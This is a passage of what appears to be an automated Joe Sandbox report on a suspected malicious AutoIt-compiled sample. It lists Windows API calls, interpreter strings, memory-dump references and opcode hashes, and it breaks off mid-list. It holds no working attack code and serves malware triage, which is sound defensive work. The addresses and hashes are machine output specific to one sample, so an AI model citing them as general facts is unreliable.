                                                                                                                            • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00C877BB
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                                                            • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                                                            • API String ID: 2910397461-517079104
                                                                                                                            • Opcode ID: cc31fbe6d15ae3bb33d207345f755031fe7ddf7217cc2b61a15cbedc439a7139
                                                                                                                            • Instruction ID: d2e4a66305a7bfb243408a74cb854ce4d3647cf1da8c44eb06561babc9905596
                                                                                                                            • Opcode Fuzzy Hash: cc31fbe6d15ae3bb33d207345f755031fe7ddf7217cc2b61a15cbedc439a7139
                                                                                                                            • Instruction Fuzzy Hash: F3A181B1A40605BFEB14DBA4DC4AFAE7BB9EB05714F108219FA14E72E0D770AD01DB64
                                                                                                                            APIs
                                                                                                                            • SetErrorMode.KERNEL32(00000001), ref: 00C7AD1E
                                                                                                                            • GetDriveTypeW.KERNEL32(?,00C9FAC0,?,\\.\,00C9F910), ref: 00C7ADFB
                                                                                                                            • SetErrorMode.KERNEL32(00000000,00C9FAC0,?,\\.\,00C9F910), ref: 00C7AF59
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorMode$DriveType
                                                                                                                            • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                                                            • API String ID: 2907320926-4222207086
                                                                                                                            • Opcode ID: b13a892dc03922e50f23822ff04f431f8cade5eed24643f931b58e3b79a5cafb
                                                                                                                            • Instruction ID: eee0c6c0c6062f468c346a0c9a5d8e3c704827bbb85902e51f6a2bb66c45e756
                                                                                                                            • Opcode Fuzzy Hash: b13a892dc03922e50f23822ff04f431f8cade5eed24643f931b58e3b79a5cafb
                                                                                                                            • Instruction Fuzzy Hash: 355184B1649205EB8B10DB91C952EBE7361EB89700B20C06BF41BA72D1DB319E46FB53
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: __wcsnicmp
                                                                                                                            • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                                                                            • API String ID: 1038674560-86951937
                                                                                                                            • Opcode ID: 80c9c3fd0f7716fe39608c00de9f46f1142d270a6558b60debd20ef8855e7f65
                                                                                                                            • Instruction ID: 3f1a1d970af15ee194d5bcc649d7ba462d98bef3b05f1fe09190c3d2b0a1d862
                                                                                                                            • Opcode Fuzzy Hash: 80c9c3fd0f7716fe39608c00de9f46f1142d270a6558b60debd20ef8855e7f65
                                                                                                                            • Instruction Fuzzy Hash: 348104B1640215ABCF21BF65EC46FFF7768BF07700F044024F945AA192EB61DA86F2A1
                                                                                                                            APIs
                                                                                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 00C99AD2
                                                                                                                            • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00C99B8B
                                                                                                                            • SendMessageW.USER32(?,00001102,00000002,?), ref: 00C99BA7
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MessageSend$Window
                                                                                                                            • String ID: 0
                                                                                                                            • API String ID: 2326795674-4108050209
                                                                                                                            • Opcode ID: 5d896b5eab2908c7ae208aaff4716a8bf43bc5acee13b3450f21b3e8f073f427
                                                                                                                            • Instruction ID: bc8b5cd82bd9a91b67a241bef3584d930be4a0df5427c1e4425570c017b8c443
                                                                                                                            • Opcode Fuzzy Hash: 5d896b5eab2908c7ae208aaff4716a8bf43bc5acee13b3450f21b3e8f073f427
                                                                                                                            • Instruction Fuzzy Hash: E402DD30104301AFEB25CF29C88DBAABBE5FF49314F04452DF9A9D62A1C735DA45DB92
                                                                                                                            APIs
                                                                                                                            • GetSysColor.USER32(00000012), ref: 00C9A903
                                                                                                                            • SetTextColor.GDI32(?,?), ref: 00C9A907
                                                                                                                            • GetSysColorBrush.USER32(0000000F), ref: 00C9A91D
                                                                                                                            • GetSysColor.USER32(0000000F), ref: 00C9A928
                                                                                                                            • CreateSolidBrush.GDI32(?), ref: 00C9A92D
                                                                                                                            • GetSysColor.USER32(00000011), ref: 00C9A945
                                                                                                                            • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00C9A953
                                                                                                                            • SelectObject.GDI32(?,00000000), ref: 00C9A964
                                                                                                                            • SetBkColor.GDI32(?,00000000), ref: 00C9A96D
                                                                                                                            • SelectObject.GDI32(?,?), ref: 00C9A97A
                                                                                                                            • InflateRect.USER32(?,000000FF,000000FF), ref: 00C9A999
                                                                                                                            • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00C9A9B0
                                                                                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 00C9A9C5
                                                                                                                            • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00C9A9ED
                                                                                                                            • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00C9AA14
                                                                                                                            • InflateRect.USER32(?,000000FD,000000FD), ref: 00C9AA32
                                                                                                                            • DrawFocusRect.USER32(?,?), ref: 00C9AA3D
                                                                                                                            • GetSysColor.USER32(00000011), ref: 00C9AA4B
                                                                                                                            • SetTextColor.GDI32(?,00000000), ref: 00C9AA53
                                                                                                                            • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00C9AA67
                                                                                                                            • SelectObject.GDI32(?,00C9A5FA), ref: 00C9AA7E
                                                                                                                            • DeleteObject.GDI32(?), ref: 00C9AA89
                                                                                                                            • SelectObject.GDI32(?,?), ref: 00C9AA8F
                                                                                                                            • DeleteObject.GDI32(?), ref: 00C9AA94
                                                                                                                            • SetTextColor.GDI32(?,?), ref: 00C9AA9A
                                                                                                                            • SetBkColor.GDI32(?,?), ref: 00C9AAA4
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1996641542-0
                                                                                                                            • Opcode ID: 1809af119a527a840173cdd59015f9b0c0811bbf1b1beea65b85116c86af0d12
                                                                                                                            • Instruction ID: 9512f3d028b2c64f3f056bcf0109f8f68330d23922bba52c1ccdd871f091edcd
                                                                                                                            • Opcode Fuzzy Hash: 1809af119a527a840173cdd59015f9b0c0811bbf1b1beea65b85116c86af0d12
                                                                                                                            • Instruction Fuzzy Hash: 1D510C71900218EFDF119FA4DC4CBAE7BB9FB48320F21452AF911EB2A1D6759A41DB90
                                                                                                                            APIs
                                                                                                                            • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00C98AC1
                                                                                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00C98AD2
                                                                                                                            • CharNextW.USER32(0000014E), ref: 00C98B01
                                                                                                                            • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00C98B42
                                                                                                                            • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00C98B58
                                                                                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00C98B69
                                                                                                                            • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00C98B86
                                                                                                                            • SetWindowTextW.USER32(?,0000014E), ref: 00C98BD8
                                                                                                                            • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00C98BEE
                                                                                                                            • SendMessageW.USER32(?,00001002,00000000,?), ref: 00C98C1F
                                                                                                                            • _memset.LIBCMT ref: 00C98C44
                                                                                                                            • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00C98C8D
                                                                                                                            • _memset.LIBCMT ref: 00C98CEC
                                                                                                                            • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00C98D16
                                                                                                                            • SendMessageW.USER32(?,00001074,?,00000001), ref: 00C98D6E
                                                                                                                            • SendMessageW.USER32(?,0000133D,?,?), ref: 00C98E1B
                                                                                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 00C98E3D
                                                                                                                            • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00C98E87
                                                                                                                            • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00C98EB4
                                                                                                                            • DrawMenuBar.USER32(?), ref: 00C98EC3
                                                                                                                            • SetWindowTextW.USER32(?,0000014E), ref: 00C98EEB
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                                                                                            • String ID: 0
                                                                                                                            • API String ID: 1073566785-4108050209
                                                                                                                            • Opcode ID: 1249843093dbdd77ba0930895e23deca33df9446659bb5d09b7abbed1b966b66
                                                                                                                            • Instruction ID: 2023fc6d1e04e67e035bd1f328dbe128e76e5689a4b99182776a704d865916fc
                                                                                                                            • Opcode Fuzzy Hash: 1249843093dbdd77ba0930895e23deca33df9446659bb5d09b7abbed1b966b66
                                                                                                                            • Instruction Fuzzy Hash: 22E15071900218ABDF209F61CC88FEE7B79EF06710F10815AF925AB290DF749A85DF60
                                                                                                                            APIs
                                                                                                                            • GetCursorPos.USER32(?), ref: 00C949CA
                                                                                                                            • GetDesktopWindow.USER32 ref: 00C949DF
                                                                                                                            • GetWindowRect.USER32(00000000), ref: 00C949E6
                                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00C94A48
                                                                                                                            • DestroyWindow.USER32(?), ref: 00C94A74
                                                                                                                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00C94A9D
                                                                                                                            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00C94ABB
                                                                                                                            • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00C94AE1
                                                                                                                            • SendMessageW.USER32(?,00000421,?,?), ref: 00C94AF6
                                                                                                                            • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00C94B09
                                                                                                                            • IsWindowVisible.USER32(?), ref: 00C94B29
                                                                                                                            • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00C94B44
                                                                                                                            • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00C94B58
                                                                                                                            • GetWindowRect.USER32(?,?), ref: 00C94B70
                                                                                                                            • MonitorFromPoint.USER32(?,?,00000002), ref: 00C94B96
                                                                                                                            • GetMonitorInfoW.USER32(00000000,?), ref: 00C94BB0
                                                                                                                            • CopyRect.USER32(?,?), ref: 00C94BC7
                                                                                                                            • SendMessageW.USER32(?,00000412,00000000), ref: 00C94C32
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                                                            • String ID: ($0$tooltips_class32
                                                                                                                            • API String ID: 698492251-4156429822
                                                                                                                            • Opcode ID: 24bab89de8df9f3b6c486a83c30d093151606a5970b3e1cf7932310c7e3b7304
                                                                                                                            • Instruction ID: 3ba6362a9ebd1603487721974658f93edaf4902a9c12d0b8bbdb96caa7e32bfa
                                                                                                                            • Opcode Fuzzy Hash: 24bab89de8df9f3b6c486a83c30d093151606a5970b3e1cf7932310c7e3b7304
                                                                                                                            • Instruction Fuzzy Hash: 98B18B71608340AFDB08DF65C848F6ABBE4FF89310F00891DF5999B2A1DB70E946DB95
                                                                                                                            APIs
                                                                                                                            • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00C744AC
                                                                                                                            • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00C744D2
                                                                                                                            • _wcscpy.LIBCMT ref: 00C74500
                                                                                                                            • _wcscmp.LIBCMT ref: 00C7450B
                                                                                                                            • _wcscat.LIBCMT ref: 00C74521
                                                                                                                            • _wcsstr.LIBCMT ref: 00C7452C
                                                                                                                            • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00C74548
                                                                                                                            • _wcscat.LIBCMT ref: 00C74591
                                                                                                                            • _wcscat.LIBCMT ref: 00C74598
                                                                                                                            • _wcsncpy.LIBCMT ref: 00C745C3
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                                                                                            • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                                                            • API String ID: 699586101-1459072770
                                                                                                                            • Opcode ID: 81fbbdbfb6d4e380bc1169252d39950bcb0946d36df3b473b2c03f063e199e17
                                                                                                                            • Instruction ID: 16816cb57a72ab4b4fcc1fad94ba7fa7f34ceb0a0e8a657a557c28af85fcf6f3
                                                                                                                            • Opcode Fuzzy Hash: 81fbbdbfb6d4e380bc1169252d39950bcb0946d36df3b473b2c03f063e199e17
                                                                                                                            • Instruction Fuzzy Hash: CE41F7326102147BDB14AB74DC47FBF77ACDF41710F14406AF909E6182EB359A01A6A9
                                                                                                                            APIs
                                                                                                                            • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00C128BC
                                                                                                                            • GetSystemMetrics.USER32(00000007), ref: 00C128C4
                                                                                                                            • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00C128EF
                                                                                                                            • GetSystemMetrics.USER32(00000008), ref: 00C128F7
                                                                                                                            • GetSystemMetrics.USER32(00000004), ref: 00C1291C
                                                                                                                            • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00C12939
                                                                                                                            • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00C12949
                                                                                                                            • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00C1297C
                                                                                                                            • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00C12990
                                                                                                                            • GetClientRect.USER32(00000000,000000FF), ref: 00C129AE
                                                                                                                            • GetStockObject.GDI32(00000011), ref: 00C129CA
                                                                                                                            • SendMessageW.USER32(00000000,00000030,00000000), ref: 00C129D5
                                                                                                                              • Part of subcall function 00C12344: GetCursorPos.USER32(?), ref: 00C12357
                                                                                                                              • Part of subcall function 00C12344: ScreenToClient.USER32(00CD57B0,?), ref: 00C12374
                                                                                                                              • Part of subcall function 00C12344: GetAsyncKeyState.USER32(00000001), ref: 00C12399
                                                                                                                              • Part of subcall function 00C12344: GetAsyncKeyState.USER32(00000002), ref: 00C123A7
                                                                                                                            • SetTimer.USER32(00000000,00000000,00000028,00C11256), ref: 00C129FC
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                                                            • String ID: AutoIt v3 GUI
                                                                                                                            • API String ID: 1458621304-248962490
                                                                                                                            • Opcode ID: 65c393b33c1e5a8ece0bbb3a78e58d9975c34d54f591b527b210ed38a03f589f
                                                                                                                            • Instruction ID: 36a95a6e0e416e18910d0fbcdf1fef13e74c282a2fcec3781027030047c3b06e
                                                                                                                            • Opcode Fuzzy Hash: 65c393b33c1e5a8ece0bbb3a78e58d9975c34d54f591b527b210ed38a03f589f
                                                                                                                            • Instruction Fuzzy Hash: B5B15D75A0120ADFDB14DFA8DC89BED7BB4FB08311F10412AFA15E62E0DB749951EB50
                                                                                                                            APIs
                                                                                                                            • GetClassNameW.USER32(?,?,00000100), ref: 00C6A47A
                                                                                                                            • __swprintf.LIBCMT ref: 00C6A51B
                                                                                                                            • _wcscmp.LIBCMT ref: 00C6A52E
                                                                                                                            • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00C6A583
                                                                                                                            • _wcscmp.LIBCMT ref: 00C6A5BF
                                                                                                                            • GetClassNameW.USER32(?,?,00000400), ref: 00C6A5F6
                                                                                                                            • GetDlgCtrlID.USER32(?), ref: 00C6A648
                                                                                                                            • GetWindowRect.USER32(?,?), ref: 00C6A67E
                                                                                                                            • GetParent.USER32(?), ref: 00C6A69C
                                                                                                                            • ScreenToClient.USER32(00000000), ref: 00C6A6A3
                                                                                                                            • GetClassNameW.USER32(?,?,00000100), ref: 00C6A71D
                                                                                                                            • _wcscmp.LIBCMT ref: 00C6A731
                                                                                                                            • GetWindowTextW.USER32(?,?,00000400), ref: 00C6A757
                                                                                                                            • _wcscmp.LIBCMT ref: 00C6A76B
                                                                                                                              • Part of subcall function 00C3362C: _iswctype.LIBCMT ref: 00C33634
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                                                                                                            • String ID: %s%u
                                                                                                                            • API String ID: 3744389584-679674701
                                                                                                                            • Opcode ID: 34a33f8f8b345b64f37fd75b8abdd994e37f6eafbf020182e1cb6ca616bb1ff8
                                                                                                                            • Instruction ID: a7a594205270e2ef5bcf5874b72d1b072de87f47398d750be8c20f15755ca014
                                                                                                                            • Opcode Fuzzy Hash: 34a33f8f8b345b64f37fd75b8abdd994e37f6eafbf020182e1cb6ca616bb1ff8
                                                                                                                            • Instruction Fuzzy Hash: C9A1A271204706AFD724DF64C8C4BAAB7E8FF44355F108529F9A9E2150DB30EA56CF92
                                                                                                                            APIs
                                                                                                                            • GetClassNameW.USER32(00000008,?,00000400), ref: 00C6AF18
                                                                                                                            • _wcscmp.LIBCMT ref: 00C6AF29
                                                                                                                            • GetWindowTextW.USER32(00000001,?,00000400), ref: 00C6AF51
                                                                                                                            • CharUpperBuffW.USER32(?,00000000), ref: 00C6AF6E
                                                                                                                            • _wcscmp.LIBCMT ref: 00C6AF8C
                                                                                                                            • _wcsstr.LIBCMT ref: 00C6AF9D
                                                                                                                            • GetClassNameW.USER32(00000018,?,00000400), ref: 00C6AFD5
                                                                                                                            • _wcscmp.LIBCMT ref: 00C6AFE5
                                                                                                                            • GetWindowTextW.USER32(00000002,?,00000400), ref: 00C6B00C
                                                                                                                            • GetClassNameW.USER32(00000018,?,00000400), ref: 00C6B055
                                                                                                                            • _wcscmp.LIBCMT ref: 00C6B065
                                                                                                                            • GetClassNameW.USER32(00000010,?,00000400), ref: 00C6B08D
                                                                                                                            • GetWindowRect.USER32(00000004,?), ref: 00C6B0F6
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
